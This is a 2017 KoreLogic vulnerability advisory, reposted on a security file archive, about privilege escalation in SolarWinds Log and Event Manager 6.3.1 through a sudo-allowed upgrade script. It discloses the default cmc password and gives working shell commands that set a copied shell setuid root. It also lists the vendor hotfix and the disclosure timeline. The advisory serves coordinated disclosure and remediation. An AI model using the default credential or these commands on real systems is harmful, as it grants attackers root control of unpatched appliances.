what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Solarwinds LEM 6.3.1 Sudo Script Abuse Privilege Escalation

Solarwinds LEM 6.3.1 Sudo Script Abuse Privilege Escalation
Posted Apr 24, 2017
Authored by Hank Leininger, Matthew Bergin | Site korelogic.com

An attacker can abuse functionality provided by a script which may be run with root privilege in order to elevate privilege on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1.

tags | exploit, root
SHA-256 | 541cc742cf8744931b966ccfc14ec82005cd85e4a6e1bff7ce5f93c7ba245576

Solarwinds LEM 6.3.1 Sudo Script Abuse Privilege Escalation

Change Mirror Download
KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse

Title: Solarwinds LEM Privilege Escalation via Sudo Script Abuse
Advisory ID: KL-001-2017-006
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-006.txt


1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

An attacker can abuse functionality provided by a script which
may be run with root privilege in order to elevate privilege.

3. Technical Description

Should an attacker gain access to the SSH console for the
cmc user, root access to the underlying operating system can be
achieved. The default password for the cmc user is "password".

The cmc account can run certain script files with root privilege.
Listed below:

cmc ALL=(ALL) NOPASSWD:
/usr/local/contego/scripts/activate.pl,
/usr/local/contego/scripts/apply_hotfix,
/usr/local/contego/scripts/cleantemp.pl,
/usr/local/contego/scripts/contego-archive,
/usr/local/contego/scripts/contego-backup,
/usr/local/contego/scripts/contego-logbackup,
/usr/local/contego/scripts/debugdump.pl,
/usr/local/contego/scripts/disable_ipv6.sh,
/usr/local/contego/scripts/exportsyslog.pl,
/usr/local/contego/scripts/hostname.sh,
/usr/local/contego/scripts/ipchains_restore.sh,
/usr/local/contego/scripts/managerReset.pl,
/usr/local/contego/scripts/mountshare.sh,
/usr/local/contego/scripts/mountsolr.pl,
/usr/local/contego/scripts/netconfig.sh,
/usr/local/contego/scripts/opseccontrol.sh,
/usr/local/contego/scripts/rcc.pl,
/usr/local/contego/scripts/setupCert.sh,
/usr/local/contego/scripts/sim2lem.pl,
/usr/local/contego/scripts/snortcontrol.sh,
/usr/local/contego/scripts/sshcontrol.sh,
/usr/local/contego/scripts/swi_login_update.pl,
/usr/local/contego/scripts/timecontrol.sh,
/usr/local/contego/scripts/upgrade.pl,
/usr/local/contego/scripts/upgrade21.sh,
/usr/local/contego/scripts/upgrade_bootloader.sh,
/usr/local/contego/scripts/recovery.py,
/sbin/shutdown,
/usr/bin/lem/lynx-admin-ui

One script, upgrade21.sh allows the user to change ownership and
permission bits for an arbitrary file. This can be abused to
elevate privilege to root.

cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh
cmc@swi-lem:/usr/local/contego/scripts$ sudo ./upgrade21.sh setperms /tmp/koresh root root 4755
sudo: unable to resolve host swi-lem
cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root)
groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Hank Leininger and Matt
Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds <psirt@solarwinds.com> using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close